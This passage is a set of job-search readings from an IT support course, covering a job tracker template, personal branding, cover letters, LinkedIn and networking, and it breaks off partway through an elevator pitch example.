This is an optional activity. To "pass" this practice quiz, you must receive 100%, or 1 out of 1 point, by
completing the activity below.

Activity overview

In this activity, you will create a job search project plan to help you track your progress and expectations
during your job search.

Be sure to complete this activity before moving on. Once you have completed it, you will have a project
plan you can use to help you when you search for a job.

Step-By-Step Instructions

Part 1 - Create and track your job search plan


Step 1: Access the template

Click the link to create a copy of the template. If you don’t have a Google account, download the template
directly from the attachment below.

Link to template: Job Search Plan Template

OR

Download template attachment:

Activity Template_ Job search project plan

XLSX File

Step 2: Choose an industry or specialty

Since project managers work in nearly every industry, the first step in job search is choosing an industry or
specialty. Reflect on your passions, what communities you’d like to work with, or what work gets you
excited, and investigate project management opportunities in those areas. Here are some more examples
of industries you can explore: 

• Business
• Construction
• Government
• Education
• Finance
• Marketing

Check that you are in the Job Tracker tab. Once you have determined your preferred industry, record it in
the Industry column.

Step 3: Explore and determine your desired job

Now that you know what industry you’re searching in, it’s time to get specific. For example, if you chose the
education industry, there are many avenues you can take as an IT Support professional. You could work in
education, government positions, or commercial businesses. 

If you're unsure what kinds of opportunities are available, search for a company in the industry of your
choice and review the career opportunities for IT support roles. Once you've found a job you are interested
in, record the company and job title in the appropriate columns. Paste the link to the job description under Job
Link.

Step 4: Track your networking

Networking can be a great tool that can lead to potential job opportunities. If you apply for a job through a
referral, record the name and contact information of the person who referred you under Referral Name
and Referral Contact Information. 

Step 5: Customize your resume and apply (Optional)

Tailor your resume and cover letter to reflect the language used in the job description and apply as soon as
possible. Refer to the activity on creating a resume to help prepare for your job search.

Once you've applied to the job, identify the resume you used under Resume Used and the date on which
you applied under Date Applied.

Step 6 (Optional): Prepare for and schedule your first interview 

If you schedule an interview with a recruiter, record the interview date, your interviewer’s name, and your
interviewer’s contact information in the next three columns. 

Step 7 (Optional): Thank your interviewer 

Once you’ve successfully completed your first interview, make sure to send a thank you email to your
interviewer within 24 hours. Remind them of who you are, what job you applied for, and thank them for
their time. Your interviewer will likely appreciate your courtesy, which will make you more memorable. 

Don't forget to record the date you send the thank you email under Follow-up Email Date.

Step 8 (Optional): Prepare for further interviews

As you move forward in the application process, you will likely have at least one or two more interviews.
Log any further information in the remaining columns.

Step 9: Keep trying

Successfully applying to and landing a job is a competitive and difficult process. No matter the outcome of
a certain application, persistence pays off!

Part 2 - Cultivate and maintain your networking relationships (Optional)


Networking is a critical tool in your job search, as it can help you learn about new job opportunities, gain
information on your target industry, and help open doors for your career. Cultivate your network of former
and current coworkers, and use online networking platforms like LinkedIn to connect to others in your
target industry. (Review the activity on setting up a professional social media profile to help you get
started.) Letting your network know about your interest in project management could lead to
informational interviews with those in your target field, or referrals for job openings. Be sure to keep track
of each connection you make, and each new opportunity that arises.

Step 1: Open Tab 2 of the template

Now, go to the Network Tracker tab.

Step 2: Fill in personal contact information

Once you’ve connected with someone, you should track your relationship with them. Record the date of
your first meeting, the person’s name, and their contact information in the first three columns.

Step 3: Record professional takeaways

Make note of anything new you learned about the industry or job from your conversation under Key
Questions. Pay close attention to any issues that your contact deems important. 

Step 4: Recollect on common ground

It is also helpful to remember interesting details or stories from your conversation, both personal and
professional. Write down any professional tips, common interests, or fun facts from your conversation
under Professional Takeaways and Personal Talking Points. You can use these details to build on your
connection with your contact the next time you connect with them.

Step 5: Brainstorm further questions

You will most likely have more questions after your first networking session. Record these under Further
Questions. You can use these questions to reconnect with your contact or ask future contacts.

Step 6: Schedule your next meeting


Estimate the date you next want to reach out to your contact. After your first meeting, the six-month mark
is a good choice, although it could be sooner depending on your level of connection or if you agreed on
next steps when speaking with them. Record the date you plan to reach out again under Next Outreach.

Pro Tip: Save the template


Finally, be sure to save a blank copy of the job search project plan template you used to complete this
activity. You can use it for further practice or in your own personal or professional projects.

What to Include in Your Response

Be sure to address the following elements in your completed job search project plan:

Job Tracker Tab 1 should include:

• Industry
• Company
• Job Title
• Job Link

Network Tracker Tab 2 (Optional) should include:

• Contact information
• First meeting date
• Professional takeaways
• Common interests or fun facts
• Further questions to ask
• The date you plan to reach out again


Personal Branding

Having a good resume and an excellent elevator pitch are important. They will show
employers your skills and your work history, and they will give you a chance to impress
employers with what you have done, and what you can do for them. There is one more step
you can take to make sure you stand out from other candidates. Having your own personal
brand will make you unique and help you stand out from other candidates. This reading will
help you build your own personal brand. 

Building your personal brand

Your personal brand represents you, so the first part of personal branding is to look at
yourself and see what makes you unique. Brands represent what they are. Product makers
use branding to help people notice their products, and to develop people’s trust in their
products and keep people coming back to them. You need to build a brand that does the
same things for you. 

Taking an inventory of yourself

Taking an inventory of your skills, interests, and things that motivate you will give you a start
in building your personal brand. You can build an inventory in any order that works best for
you. Here are some examples of inventory questions:

• What drives you to pursue the career you chose?
• Which of your talents and skills mean the most to you?
• What is something you did in the past you are very proud of doing?
• What kinds of tasks or projects give you the most energy?
• Think about people you admire. What do you admire about them?
• What are your strengths and weaknesses?

These are examples, but you can use them to make your own inventory questions as well.
Write the questions and the answers and keep them in a notebook or journal.

Get to know your audience

Now that you have your personal inventory, get to know your audience.

• Study your potential employers and learn all about their organizations. Look for their
values and goals and see how you can align your goals and values with theirs.
• Identify who their influencers are. Once you know about the companies offering
positions, study their needs based on what the job offers say.
• Identify who the stakeholders are who have the most interest in your services.
• Look at your inventory and match what you know about yourself to those companies’
needs. Your talents, your skills, the things that give you energy, your strengths, your
knowledge and experience, and the rest of the information you put together in your
inventory are all part of the recipe for your personal brand. Now that you have the
information you need, you can start putting together your brand.

Identify some challenges the companies are facing

People often choose products because those products help them deal with a challenge or
challenges. Brands help them remember the products, so they look for those products as
soon as they have those challenges. If the challenges are ongoing, they keep using those
products. 

• Identify some ongoing challenges companies face dealing with IT.
• Think about solutions to those challenges, and how you can offer unique solutions to
those challenges.
• Show potential employers how having you in their organizations will benefit them
with your unique IT problem solving skills and knowledge of IT solutions.

Building your brand

Now that you have taken a personal inventory, studied your audience, and identified some
challenges your audience of potential employers face in their organizations, you are ready to
build your personal brand. Using the information you put together, write one or two
sentences that describe you and what you do. 

You may need to write a few drafts before you find one you like best. Once you find the one
you think is the best, you now have a brand you can use along with resumes, elevator pitches
and cover letters to stand out from other candidates.

Key Takeaway

Having a good resume and a great elevator pitch will help you impress potential employers,
but having a personal brand will help you stand out from all the other candidates. It will give
potential employers something to remember you out of all the applicants they are looking at
for the position. 
Recruiters, Headhunters, and Staffing Agencies

One of the many ways to apply and secure jobs in the IT industry is through recruiters,
headhunters, and staffing agencies. Sometimes it’s possible to secure a long-term position
for a company by first completing temporary or contract work through a recruitment agency. 

Recruiters

There are two primary types of recruiters: external and internal. External recruiters work
outside the organization they represent, usually through a recruitment agency. These types
of recruiters can help candidates find a multitude of open positions in the industry and work
with them on a non-contractual basis until the candidate secures a position. Internal
recruiters work with the company of interest. Internal recruiters can help leverage a
candidate’s application by assisting them through the hiring process within a specific
company.

Staffing Agencies

Staffing agencies assist companies with finding qualified candidates to fulfill their open
positions. These positions range anywhere from permanent to contract and contract-to-hire.
The staffing agencies are responsible for recruiting and sometimes conducting entry-level
screening questions on candidates to ensure they are a good fit for the company. If the
agency can’t find a suitable fit for the job right away, they may post the job on online job
boards on behalf of the company. The company ultimately makes the final decision for who is
selected, and the staffing agency assists with the initial onboarding process. 

Career Coaches

Career coaches can greatly assist with helping job seekers hone their job search and find
positions that cater to their strengths and personal values. They can also assist with guiding
the candidate through all the ups and downs of the job hunting process, reframing thoughts,
challenging limiting beliefs about the job search process, and finding opportunities for
professional growth. However, career coaches often cost more than other routes for securing
a job. Consider hiring a career coach if you’re experiencing challenges in moving up in your
career, securing interviews, receiving offers, or are unsure about what the next steps in your
career should look like. There are multiple types of career coaches out there. Conduct
research and find the type of coach you’re looking for. Some provide basic services such as
resume reviews, editing of cover letters, or LinkedIn profile analysis. Other career coaches will
go further and offer live coaching sessions either in person or online, offer additional
resources to help you on your journey, and/or a supportive community of other job seekers. 

Write a Cover Letter

Introduction:

A cover letter—a personal introduction to promote yourself—serves as a companion
document to a resume. Its main purpose is to elaborate on your professional skills,
motivations, and why you should be viewed as the best candidate for a job.

There are three types of cover letters: 

• Networking—Addressed to individuals to ask for their help finding a job at their
company
• Prospecting—Addressed to companies to explore all open job opportunities
• Application—Addressed to hiring managers to emphasize your fit for a specific job

This reading focuses on helping you write application cover letters. Employers have “who,
what, where, when, why, and how” types of questions when they gather information about
job applicants. Your resume answers what (you have done), where (you worked), and when
(you were employed). Your application cover letter describes in more detail who (you are),
why (you want the job), and how (you will be successful in the role).  

Body:

Prepare to write a cover letter 

Pro tip: Not all job applications require a cover letter. When a cover letter is stated as being
optional, it’s best to consider how much a cover letter might improve your standing. The
following are common situations when people prefer to include a cover letter:

• When starting out in a career (early career applicant)
• When making a career transition
• When experience, education, or training isn’t an exact match with the listed
requirements
• When entering a crowded field of applicants

Many people agree that no cover letter is better than a poorly written one! Even if a cover
letter has no obvious errors, submitting a few paragraphs with very general statements isn’t
going to help you that much. Before you write a cover letter, follow these steps to ensure you
create a meaningful one. 

Step 1: Research the company or organization

You can find out a lot about a company from these methods:

• Browse the company’s website
• Follow the company on social media including LinkedIn
• Perform a search on the company’s financial standing and investors, if applicable
• Perform a search on the company’s known competitors
• Ask your relatives, friends, and colleagues what they know about the company

Step 2: Inventory the required skills from the job description

Read the job description carefully and determine what you think are the most important skills
for an applicant to have and why. 

Step 3: Prioritize your matching skills from strongest to weakest

Based on the skills you identified in the previous step, identify your skills that match or are
most closely aligned (associated) with them. Next, prioritize your matching skills from the
strongest to the weakest. People often skip this ordering process. Ranking your skills enables
you to emphasize your strongest skills first in your cover letter.

Parts of a cover letter 

Pro tip: A cover letter is between 250-400 words in length and doesn’t exceed one page. 

Review the goals for each section of a cover letter below. 

Introduction

The primary goals of the introduction section of a cover letter are to:

• Identify the position you’re applying for
• Show your enthusiasm for the company
• Encourage people on the hiring team to learn more about you

Example

I’m applying for the IT support specialist position, and can’t imagine a more exciting
role. As a frequent and avid user of your services, I’m eager to pursue this career opportunity.

Body Section

The goal of the body section of a cover letter is to describe how your skills apply to the open
position. Suppose the job description has these qualifications:

• Troubleshooting experience with laptops, desktops, and printers
• At least 1 year of customer service experience
• Technical problem solving with attention to detail

The following example shows how you can map your experiences to these qualifications in
the body of your cover letter.

Example

I completed the Google IT Support Professional certificate and have previous customer service
experience in retail electronics. I was responsible for helping customers choose the right devices
for their needs, and solve any problems they had with those devices. I also helped keep the
computers and printers at the location running well by finding and solving any
technical problems. With my attention to detail, the IT support team will be able to solve
problems quickly and efficiently.

Pro tip: Avoid the temptation to rehash the content of your resume. A warning sign is if your
cover letter has essentially the same information as your resume but in a paragraph format. 

Pro tip: Focus on what you can do for the company rather than on how you would benefit
from being hired for that position. The difference between being company-focused and self-
focused can be subtle, as in the following sentences:

• I would like to develop information technology solutions to keep your company’s IT
structure solid and provide efficiency to the company’s IT systems. (company-focused;
what you will do for the company)
• I would like to grow my IT support skills by developing IT solutions for efficient
information technology solutions I believe in. (self-focused; what you would like to
gain by being in the role)

Closing

The goal of the closing section of a cover letter is to restate your interest in the company and
position. It is also used to indicate your expectations, such as scheduling an interview, being
considered for other jobs, or a timeframe for follow up.

Example

Thank you for taking the time to review my resume for this position. I’m confident I can excel in
this role using my combined work experience and skills from the Google IT Support Professional
certificate. I’m looking forward to an interview and request the privilege to follow up on my
application’s progress in the coming weeks.

Proofread your cover letter

Many errors in cover letters are caused by copying and pasting text from one cover letter to
another. After you write your cover letter, proofread it carefully to catch these common
things:

• Awkward formality—Few people call people Sir or Madam nowadays, so you shouldn’t
use these in your cover letter either. Also refrain from using “To whom it may concern,”
which sounds highly impersonal. If you don’t know the name of the hiring manager,
use “Dear Hiring Team.” Likewise, consider using “Best regards” instead of
“Sincerely,” which sounds a little outdated.
• Misspelled words (especially those that sound the same but are spelled differently).
For example, “affect” and “effect,” “then” and “than,” and “your” and “you’re.”
• Mismatched skills—Make sure you aren’t incorporating skills for the wrong job
description in your cover letter. This happens with copying and pasting.
• Passive voice—Use active voice whenever possible: “I revised the ads” instead of
passive voice: “I ensured that the ads were revised.”
• Long anecdotes—Save stories that describe any past results you achieved for when
you are being interviewed.

Key takeaways

Cover letters help introduce the best points about yourself to a potential employer. Make sure
that your cover letter doesn’t simply rehash the skills outlined in your resume, but adds value
by describing how your skills align with the job requirements and how you would be
successful in the role. To write the best cover letters, it’s helpful to research the company,
identify the most important skills from the job descriptions, and prioritize and include your
matching and relevant skills.

Getting Started with LinkedIn

Introduction:

LinkedIn is a global professional network that lets you keep a resume online and link up with
recruiters looking for professionals in many fields including IT support specialists. Joining
LinkedIn is easy, and there are many opportunities available through it.

Body:

Signing up 

Signing up with LinkedIn is simple. Just follow these simple steps: 

1. Browse to linkedin.com
2. Click Join now.
3. After you click Join now:
   1. Enter your email address and a password and click Agree & Join (or click Join with
   Google to link to a Google account).
   2. Enter your first and last name and click Continue.
   3. Enter your country/region, your postal code, and location with the area (this helps
   LinkedIn find job opportunities near you).
   4. Enter your most recent job title, or select I’m a student.
   5. If you entered your most recent job title, select your employment type and enter the
   name of your most recent company.
   6. If you select self-employed or freelance, LinkedIn will ask for your industry.
   7. Click confirm your email address. You will receive an email from LinkedIn.
   8. To confirm your email address, click Agree & Confirm in your email.
   9. LinkedIn will then ask if you are looking for a job. Click the answer that applies. If you
   select Yes, LinkedIn will help you start looking for job opportunities.
   10. Follow any of the steps under Join Now that are relevant.

To upload your resume:

1. After you join LinkedIn, click on job application settings.
2. Click upload under the resume section.
3. LinkedIn will store four resumes so you can reuse them as you need them.

LinkedIn also has a resume builder that you can use to help build your resume if you are
using LinkedIn on a desktop. The resume builder only works on a desktop or laptop
computer.

Including basic information in your profile

It is a good idea to take your time filling out every section of your profile. This helps recruiters
find your profile and helps people you connect with get to know you better. Start with your
photo. Here are some tips to help you choose a great picture for your new profile:

• Choose an image that looks like you: You want to make sure that your profile is the
best representation of you and that includes your photo. You want a potential
connection or potential employer to be able to recognize you from your profile picture
if you were to meet.
• Use your industry as an example: If you are having trouble deciding what is
appropriate for your profile image, look at other profiles in the same industry or from
companies you are interested in to get a better sense of what you should be doing.
• Choose a high-resolution image: The better the resolution, the better impression it
makes, so make sure the image you choose isn’t blurry. The ideal image size for a
LinkedIn profile picture is 400 x 400 pixels. Use a photo where your face takes up at
least 60% of the space in the frame.
• Remember to smile: Your profile picture is a snapshot of who you are as a person, so it
is ok to be serious in your photo. But smiling helps put potential connections and
potential employers at ease.

Adding connections

Connections are a great way to keep up to date with your previous coworkers, colleagues,
classmates, or even companies you want to work with. The world is a big place with a lot of
people. So here are some tips to help get you started.

1. Connect to people you know personally.
2. Add a personal touch to your invitation message. Instead of just letting them know
you would like to connect, let them know why.
3. Make sure your profile picture is current so people can recognize you.
4. Add value. Provide them with a resource, a website link, or even some content they
might find interesting in your invitation to connect.

Looking for a new position

On LinkedIn, letting recruiters and potential employers know that you are in the market for a
new job is simple. Just follow these steps:

1. Click the Me icon at the top of your LinkedIn homepage.
2. Click View profile.
3. Click the Add profile section drop-down and under Intro, select Looking for a new
job.

Make sure to select the appropriate filters for the new positions you might be looking for and
update your profile to better fit the role that you are applying for. 

Here is an example IT Support Specialist job search.

This example shows jobs available in the United States, but there are job opportunities
available all over the world.

Keeping your profile up to date

Add to your profile to keep it complete, current, and interesting. For example, remember to
add the Google IT Support Specialist certificate to your profile after you complete the
program!

Key Takeaways

LinkedIn is a resource that lets you keep a profile online including a resume so recruiters will
always have access to anything you make public. You can use LinkedIn to look for positions
and send resumes directly to the recruiters for the positions through the LinkedIn network. 

Using LinkedIn, you can find connections, search through thousands of positions offered, and
learn about companies you want to work for in your career.

How to Get Interviews

This guide is designed to help job seekers get more interviews. If you’re eager to increase the number of
interviews you’re currently getting, we have some tips and strategies for you that can make a big difference
in your results and help you overcome some of the challenges associated with job boards, such as out-of-
date listings and heavy application volumes that can make it hard to stand out.

This guide will help you address the challenges of job boards through networking. Because the idea of
networking can seem daunting for many, this guide will focus on four actionable steps you can take to
make the most of your networking efforts. You’ll learn everything from how to find people to connect with
and how to schedule and prepare for important conversations, to what to talk about and how to follow up.
If some of these strategies and actions feel challenging at first, don’t worry; they get easier over time. Plus,
you’ll be getting more interviews, so it will all be worth it!

The Importance of Networking

Learning how to network effectively is a really valuable skill with a wide range of benefits. It’s something
you’ll want to continue to focus on, and the connections you make and maintain through strategic
networking can have long-lasting positive effects on your career advancement. 

For our purposes here, we want to focus specifically on how strategic networking can help you overcome
some of the challenges associated with online job applications. Benefits include:

• Getting accurate information about job availability. The fact that a role is posted online doesn’t
mean that the hiring team is actively reviewing applications. There is often a delay between the
time a role is open and the time it’s posted online, as well as the time it is filled and taken down
from online job boards. At the same time, there are often open positions that are not (yet) posted
online for a variety of reasons. Networking can help you ensure you’ve got up-to-date information.
• Learning more details about the role. Job descriptions are not always precise. As a result, you
might end up applying for roles that you think are a good fit but are, in fact, not. Or, you might fail
to properly tailor your application to meet the needs of the hiring team. Insider information via
networking can help you understand what the team is really looking for.
• Standing out amid the competition. Once a job is posted to a job board, there are often tens or
even hundreds of people applying to it, so it can be difficult to stand out. Networking can help you
get an early jump on a new opportunity before it’s posted.

The networking process described in this guide can help you address all these challenges.

Through a short and focused conversation with someone at your target company—who has insider
knowledge of relevant opportunities—you will be able to:

• Understand the requirements for your target role at that specific company. Jobs with the same
title can vary greatly from company to company, and the actual requirements are not always
obvious from job descriptions.
• Gain insight into the company’s organizational structure and team culture to learn what’s required
for success, and understand how best to position yourself in your application materials and
interviews.
• Learn about ways to monitor and apply for opportunities at that specific company, so you can
know exactly what’s available and how to float your application to the top of the pile. You might
even be able to get a referral.
• Establish a relationship with a professional who might be able to help you in your current job
search and be a part of your professional network moving forward.

Networking for Your Job Search: The Process

How to connect with the right people

The process of networking for your job search begins with identifying the right people to network with.
Because you are looking for insider information on the role and its application process—as well as other
relevant opportunities—you need to connect with insiders. 

People you are going to network with must work in, or close to, your target role at a company you are
interested in working for. These people will have the information you need, beyond what’s publicly posted
online. They will understand the exact skills and qualities the hiring team is looking for. They’ll know the
status of currently open roles and upcoming openings, and they might even be able to connect you directly
to the hiring team. 

If you are already connected to the right people, you can jump straight to Step 2 below. If you don’t
currently know such people, begin with finding and connecting with them as described in Step 1.

Step 1: Finding the right people

To begin, put together a list of the companies you’re interested in. The more companies you have on your
list, the more people you will be able to reach out to, and the more opportunities that will be available to
you. Don’t be surprised if your company list grows to 50 or more companies. It might sound like a lot, but
remember that not every company will have the right role available when you need it.

If you are not sure how to identify target companies for your job search, consider the following ideas:

• Search job boards for openings. If a company has ever posted a relevant role, it’s worth exploring
further.
• Go through your existing contacts and research the companies where they work. Even if you
don’t know anyone in your target role, your personal and professional contacts might be able to
introduce you to their relevant coworkers.
• Identify a target industry (e.g., online education, medical supplies, entertainment). If you know
one company within that industry, you can perform a search for its competitors to expand your
list.
• Map out companies located in your area (or companies with a remote workforce, if you are
looking to work remotely). You want to make sure you can definitely be considered for any
opportunity you uncover.

Remember, your target companies do not need to have open jobs posted—you will find out exactly what is
currently available there through your networking conversations. 

Step 2: Connecting via LinkedIn

Once you know the companies you are interested in, you can start connecting with relevant people. The
method described here uses LinkedIn because it is accessible to most people. You can also ask for
introductions from mutual connections, attend professional events to meet people, post in networking
communities online, or use any other way you prefer.

To find people through LinkedIn, begin with performing a LinkedIn People Search using your target job
title as the search string, and setting a filter for “Current Companies.” See below for an example searching
for a Data Analyst at Coursera.

Review the profiles that come up to identify people you want to reach out to. Focus on people you’d like to
learn from and that you think you can build a rapport with based on their background, interests, and even
their tone of communication.  Keep in mind that people with well-developed LinkedIn profiles—that
include profile photos, summaries, and other details—are more likely to reply to you than those who have
very basic profiles, because they are likely to be more active LinkedIn users.

Once you identify a person you might be interested in speaking to, send them a connection request with a
note explaining why you are reaching out. 

Here is a sample LinkedIn outreach message:

Hi <name>, I discovered your profile because of the interesting work you do as a <role> at <company>. I’d
appreciate an opportunity to ask you a few questions to learn more about what you do and what it is like to
work at <company>. Thank you in advance for connecting with me!

Note that some of your connection requests may go unanswered. Don’t get discouraged or take it
personally. Many people are too busy or simply don’t monitor their LinkedIn messages. The great thing is
that LinkedIn provides you with access to a large number of professionals, and it’s a great idea to reach out
to a lot of people. 

Step 3: Schedule and prepare for the conversation

Once you’ve established the connection, you can ask your new contact for a time to speak. It is important
to be open to communicating via the connection's preferred approach (in-person, video, phone, in writing,
etc.), but ideally, you want to schedule a live conversation. It’s generally a more effective way to build a
relationship, and can often make it easier to get your specific questions answered. 

Make scheduling easy by suggesting a specific time to speak, offering to work around their calendar, and
sending out a calendar invitation with information on how you will connect (phone, video conferencing,
etc.). 

Here is a sample meeting request message:

Thank you for accepting my connection request! As I mentioned, I reached out because I’m researching
<industry/company> and would really appreciate an opportunity to ask you a few questions about your
experience in <role, company>. Would you be open to scheduling a 15-minute video or phone call on <date,
time>? I’m also happy to adjust to your schedule if you prefer another time.

Note that some people find it easier to provide information in writing. If you don’t get a response to your
original request for a conversation, you can follow up by asking whether it would be easier for them to
answer a few questions over email. Remember, everyone is different and it’s important to gauge and adjust
to the style of the person you are reaching out to!

Don’t be discouraged if someone does not reply to you immediately. People are busy. Since you have
already established a connection, it’s a good idea to follow up after a few days, and then again a week later
to give them a chance to reply. 

If you still don’t hear back after a couple of follow-ups, you can assume this person is too busy at this time
to speak with you and move on to other potential contacts. Remember that while this is a process of
developing personal connections, it’s also a numbers game, and you should plan to reach out to a lot of
people!

Before moving on, acknowledge your decision to your new contact—a quick note will help ensure there is
no awkwardness so you can easily reconnect in the future.

Here is a sample moving-on note:

I'm sorry we haven't been able to connect. I definitely don't want to flood your inbox with requests, so I just
wanted to thank you again for connecting with me, and if you do end up having some time to chat, please let
me know.

Preparation

Once the conversation is on the calendar, it’s time to prepare. Remember, your focus should be on learning
about your target role at the company and determining the best ways to connect to new opportunities.
Things you’ll want to focus on include:

• What is the day-to-day like in the role? What is the team structure, how are priorities decided, what
do they like about their work, and what do they struggle with?
• What skills and experiences do the hiring team look for? What is essential, and what is nice-to-have?
• Do they think your skills and background are a good fit for the role, or are there ways you can
improve your candidacy through education or experience?
• What is the best way to monitor and apply for opportunities? Is there anything coming up that is
not yet posted on the careers page?
• Are there any other people they can recommend that you speak with?

To inform your questions, you’ll want to conduct thorough research on the person you are speaking with,
the company they work at, and your target role. Consider the following sources of information:

• Your contact’s LinkedIn profile, and any information it links to. Look for information to inform
your questions as well as anything that can help you build rapport, such as shared volunteering
interests, hobbies, school experience, etc.
• Job descriptions for your target role at the company (if available). During the conversation, you’ll
have an opportunity to clarify requirements and responsibilities.
• LinkedIn profiles of people working in your target role at the company. You want to understand
their skill sets and backgrounds to get additional insights into what it takes to succeed in this role.
• Company website. You should have a good understanding of the company’s mission, business,
and anything else they chose to highlight to the public.
• Company reviews on platforms such as Glassdoor. It’s a great idea to see what people are saying
about the company, so you can ask more specific questions about the culture.
• News about the company. Just in case there is something significant happening at the company,
you want to be aware of it.
• Company careers page. Make sure you know which roles are currently posted so that you can ask
about the status, and about applying to them directly.

Step 4: Speak with your new contact

Speaking with strangers does not come naturally to many people. If you are feeling uncomfortable before
or during your first few conversations, that’s completely normal! It will get easier with time as you develop
the invaluable skill of networking. 

Remember that the other person is also going into a conversation with a stranger (you) and might not
know what to expect. To make both of you comfortable and to help build rapport, be ready to set the
structure for the conversation.

• Remind them about who you are, why you reached out, and what your goals are for the conversation. By this point, you will have done extensive research in preparation for the conversation, but your new contact might not have had the time to look at your profile and doesn’t know why exactly you reached out. Help them out by starting with a brief overview of your background and the reasons for the conversation.
• Monitor time. Conversations like this generally last 15–30 minutes. Make sure you respect the other person’s time by keeping the meeting to the length you had originally agreed upon, unless the other person wants to continue talking.
• Make it about them. While you are there to learn, the person you are speaking to is being generous with their time, and it’s your responsibility to make them feel valued and appreciated. Explain why you wanted to talk to them and show the research you’ve done. Honest praise and genuine engagement go a long way.
• Listen more than talk. Since you are there to learn about their experience and company, the primary focus of the conversation should be on the other person. Some people might be more talkative, while others may need more input from you in order to engage. Ideally, they should be speaking for 50% to 80% of the conversation. Don’t be afraid of short pauses, and be respectful and patient if they need time to gather their thoughts.
• Take note of action items as you go along. There are many action items that can come out of a conversation like this: you might need to send the other person your resume, they might offer to connect you with someone else, either one of you might want to share articles or resources that come up in the conversation, etc. It’s your responsibility to keep a record of these action items, so you can follow up on your promises and make it easy for the other person to remember theirs.
• Close the conversation by clarifying what’s next. Thank them for their time, summarize what you have learned, and go over any action items from the conversation. The goal is to make the other person feel useful and appreciated—after all, they’ve been generous with their time.

Asking for a referral

Getting a referral is an ideal outcome for a networking conversation. However, not every conversation will
end in a referral—sometimes there will be no role available, and sometimes the person might not be open
to referring you for a variety of reasons. Make sure not to take this personally or push too hard—their
reasons may have nothing to do with you specifically. It’s important to respect their boundaries and
comfort levels. It is also important to go into the conversation without the expectation of a referral.
Focusing on learning about the role and getting advice from your new connection will take the pressure off
you and them. 

If, during the course of the conversation, you confirm that there is a role available that you are qualified for,
do consider asking for a referral. You should be able to sense from the conversation whether the person
thinks you could be a valuable addition to their team and is therefore open to referring you. If you have
any doubts about that, provide an easy way for them to say “no” to you to avoid an awkward situation. For
example, you can ask, “Would you be able to refer me to this role, or do you recommend I apply online?”

If your contact agrees to refer you, make sure you understand exactly what’s required from you. Depending
on the company’s system, you might need to apply through a special referral link, have your contact
submit your resume internally on your behalf, or apply online and then have your contact reach out to the
relevant member of the hiring team. 

Step 5: Follow up

Congratulations on completing the conversation! 

Send a thank-you email

Always send a thank-you email within a day or two to the person who has been generous enough to share
their time and expertise with you. Go beyond the basic “thank you” and reinforce the connection you’ve
made by:

• Reiterating what you have learned
• Following up on your action items from the conversation. Include any materials you had promised to share and list out what else you are going to do based on the conversation (make sure to follow up on those as well when the time comes!)
• Gently reminding them about any action items the other person had volunteered for
• Offering to repay the favor by sharing any information that might be valuable to the person, or offering to connect them with people in your network

Here is a sample thank-you note:

Hi <name>, 

It was great to catch up with you today and hear about the incredible work you are doing at <company>, and
I was excited to learn about our shared interest in <x>. Here is a link to the article I had mentioned on <topic>
that I thought you might enjoy.

Thanks again for sharing about the <role> opening with me and sharing my resume with the hiring manager!
My resume is attached. Please let me know if you have any questions or need anything else from me.

Again, it was great to speak with you. Thank you for your time and willingness to share your experience with
me! Please let me know if I can ever be of any help. I have a pretty extensive network in <industry> and would
be happy to introduce you to any of my connections. 

Maintain the connection


Some conversations naturally lead to ongoing relationships where people find a lot in common and
naturally stay in touch, while others don’t create enough rapport to solidify the connection. Even if your
conversation falls into the second category, as long as you feel that you’d like to keep this person in your
active network, there are actions you can take to develop the connection over time. The key to developing
your new connection is finding natural touchpoints moving forward. For example:

• Share updates on your job search. Follow up on any advice from the conversation once you have a chance to act on it. Your connection will appreciate that you valued their guidance and will be glad to know if it helped. Also, remember to update and thank them once your job search is complete.
• Send interesting information as it comes up. If you come across an article or information that reminds you of the person, it is a great reason to send them a quick note.
• Engage on LinkedIn. If your new connection is active on LinkedIn, commenting on their posts and updates is a great way to continue the conversation.
• Add them to your celebrations calendar. Add them to your holiday mailing list. In addition, if any important dates, such as a birthday, come up in the conversation, make sure to mark your calendar and send your congratulations.

Do be mindful about your rate and volume of outreach, as you don't want to overdo it. Make sure to
establish a pace that feels right for the relationship.

Continue Growing Your Network

You now know how to find, reach out to, and develop relationships with people who can help your job
search through insider information. Not every conversation you have will result in an immediate job lead,
but many will. Networking is the most reliable way to get interviews, and it’s available to everyone with a
LinkedIn account, effective strategies and some grit. 

Don’t be discouraged if you don’t feel great about your first few conversations, or if they don’t result in
referrals. It is normal to feel uneasy about speaking with strangers, particularly at first. It’s a skill you need
to practice. Each conversation you have with an industry professional is a win. You are building one of your
most valuable professional assets—your network—one person at a time!

Learn More About Developing an Elevator Pitch


When interviewing with potential employers, it’s important to communicate who you are,
your value as an e-commerce or digital marketing professional, and what you’re searching for
in a job. A simple way to do this is with an elevator pitch. An elevator pitch is a short,
memorable description that explains an idea, business, or service in an easy-to-understand
way, typically in 60 seconds or less (the average amount of time of an elevator ride). 

While an elevator pitch is usually specific to an idea or a product, you can also use it to sell
yourself as a professional to potential employers. In an interview, a strong elevator pitch can
be used to stand out to your interviewer. It can be used to help explain why you’re a good fit
for the role or to answer the popular interview question “tell me about yourself.” This reading
helps you prepare your elevator pitch to sell yourself and the value you can provide as an IT
Support Professional.
Please examine these resources before continuing with the rest of the reading:

Showing your best self during the interview

Interview role play: Operating Systems

Amir Interview - Creating a Company Culture for Security | Coursera

Creating your elevator pitch

Provide an introduction

Start by providing an introduction. Introduce yourself and give a brief overview of your
professional background. Explain some job roles you’ve had, your years of work experience,
and the types of industries you’ve worked in. If this is your first job in IT Support, mention some
of your past roles that are unrelated.

Describe your work-related background

Even if you’re interviewing for your first internship or job in IT Support, it’s important to
clarify that this is what you want to do as a career. 

For example, you could say, “I want to apply my excellent technical problem-solving skills to
find and solve information technology problems for internal and external users.”

Show your excitement

This is where you share your passion for the field and why you want to work in the industry. If
you’re motivated to sell products online, mention that. This is also a good time to talk about
your goals. 

For example, you could say, “I love solving information technology issues because doing it
lets me research and apply new IT solutions and technologies. Long term, I’d love to develop
my knowledge of IT problem solving for company IT infrastructures.”

Communicate your interest in the company 

Communicating why you are interested in the company—and not just the role—is a great way
to help the interviewer recognize that you are knowledgeable about the company.
For example, if you were interviewing for a position for Google’s Shopping team, you could
say, “Google Shopping helps connect millions of people to the products they desire or need.
As a long-time Google Shopping user, I’m looking forward to the opportunity to be a part of
that mission and provide outstanding support.”

Elevator Pitch Examples

To bring the structure of an elevator pitch to life, check out two examples of elevator pitches
at Google. The first is by Sean, a Marketing Manager on the Google Ads team. The second is by
Joi, an Associate Product Marketing Manager.

Sean
Marketing Manager, Google Ads

I’m Sean, a Marketing Manager for Google Ads, with over a decade’s worth of experience in
